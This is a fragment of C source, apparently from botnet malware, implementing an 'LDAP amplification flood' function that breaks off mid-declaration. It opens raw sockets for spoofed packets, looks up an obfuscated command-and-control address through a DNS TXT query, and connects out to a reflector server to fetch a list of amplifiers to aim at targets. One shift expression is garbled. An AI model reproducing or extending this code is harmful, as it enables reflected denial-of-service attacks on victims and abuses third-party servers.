// LDAP amplification floodvoid flood_ldap(struct target *t, uint16_t port, ui

1. // LDAP amplification flood
2. void flood_ldap(struct target *t, uint16_t port, uint8_t num_of_targets)
3. {
4. #ifdef DEBUG
5. printf("In LDAP\n");
6. #endif
7. int i = 0;
8. struct reflectors *f;
9. int fd = -1;
10. struct sockaddr_in dest_addr;
11. struct resolve *dns;
12. struct entry *e;
13. char buf[DNS_TXT_MAX_SIZE];
14. char buf2[MAX_REFLECTORS * 4 + 1];
15. int ret = 0;
16. char *s = buf2;
17. int fd2 = -1;
18. char *data = (char *)calloc(num_of_targets, sizeof(char **));
19. int j = 0;
20. struct request r;
21.  
22. r.vector = htons(VECTOR_LDAP);
23. r.count = htonl(MAX_REFLECTORS);
24.  
25. if((fd2 = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
26. {
27. #ifdef DEBUG
28. printf("Failed to initilize the raw socket, check your privileges\n");
29. #endif
30. free(data);
31. return;
32. }
33.  
34. i = 1;
35.  
36. if(setsockopt(fd2, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) == -1)
37. {
38. #ifdef DEBUG
39. printf("Failed to set IP_HDRINCL\n");
40. #endif
41. free(data);
42. close(fd2);
43. return;
44. }
45.  
46. if((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
47. {
48. close(fd2);
49. free(data);
50. return;
51. }
52.  
53. e = retrieve_entry(ENTRY_CNC_DOMAIN);
54.  
55. if(!(dns = dns_lookup(e->buf, QUERY_TYPE_TXT)))
56. {
57. #ifdef DEBUG
58. printf("Failed to make the DNS query to retrieve the reflector server address, returning\n");
59. #endif
60. free(dns);
61. close(fd);
62. close(fd2);
63. free(data);
64. return;
65. }
66.  
67. for(i = 0; i < dns->data_len; i++)
68. buf[i] = dns->buf[i];
69. for(i = 0; i < dns->data_len; i += 2)
70. {
71. char tmp = buf[i];
72. buf[i] = buf[i + 1];
73. buf[i + 1] = tmp;
74. }
75.  
76. util_null(dns->buf, 0, dns->data_len);
77. decode(buf, dns->buf, dns->data_len);
78. dns->data_len = util_strlen(dns->buf);
79.  
80. if(dns->data_len < 1 || dns->data_len > 15)
81. {
82. #ifdef DEBUG
83. printf("Invalid reflector server address length retrieved, returning\n");
84. #endif
85. free(dns);
86. close(fd);
87. close(fd2);
88. free(data);
89. return;
90. }
91.  
92. #ifdef DEBUG
93. printf("Received reflector server address %s\n", dns->buf);
94. #endif
95.  
96. dest_addr.sin_family = AF_INET;
97. dest_addr.sin_port = htons(REFLECTOR_SERVER_PORT);
98. dest_addr.sin_addr.s_addr = inet_addr(dns->buf);
99.  
100. if(connect(fd, (struct sockaddr_in *)&dest_addr, sizeof(dest_addr)) == -1)
101. {
102. #ifdef DEBUG
103. printf("Failed to connect to the reflector server, returning\n");
104. #endif
105. free(dns);
106. close(fd);
107. close(fd2);
108. free(data);
109. return;
110. }
111.  
112. #ifdef DEBUG
113. printf("Connected to the reflector server!\n");
114. #endif
115.  
116. if(send(fd, &r, sizeof(r), MSG_NOSIGNAL) < 1)
117. {
118. #ifdef DEBUG
119. printf("Failed to request the vector/count\n");
120. #endif
121. free(dns);
122. close(fd);
123. close(fd2);
124. free(data);
125. return;
126. }
127.  
128. #ifdef DEBUG
129. printf("Successfully requested %d reflectors\n", ntohl(r.count));
130. #endif
131.  
132. ret = recv(fd, buf2, MAX_REFLECTORS * 4 + 1, 0);
133. if(ret < 1)
134. {
135. #ifdef DEBUG
136. printf("Failed to retrieve reflectors\n");
137. #endif
138. free(dns);
139. close(fd);
140. close(fd2);
141. free(data);
142. return;
143. }
144.  
145. #ifdef DEBUG
146. printf("Processing reflectors...\n");
147. #endif
148.  
149. f = (struct reflectors *)calloc(MAX_REFLECTORS, sizeof(struct reflectors));
150. for(i = 0; i < MAX_REFLECTORS; i++)
151. {
152. f[i].address = *((uint32_t *)s);
153. s += sizeof(uint32_t);
154. #ifdef DEBUG
155. printf("Processed reflector %d.%d.%d.%d\n", f[i].address & 0xff, (f[i].address >> & 0xff, (f[i].address >> 16) & 0xff, (f[i].address >> 24) & 0xff);
156. #endif
157. }
158.  
159. #ifdef DEBUG
160. printf("Successfully processed reflectors\n");
161. #endif
162.  
163. for(i = 0; i < num_of_targets; i++)
164. {
165. struct iphdr *ip_header;
166. struct udphd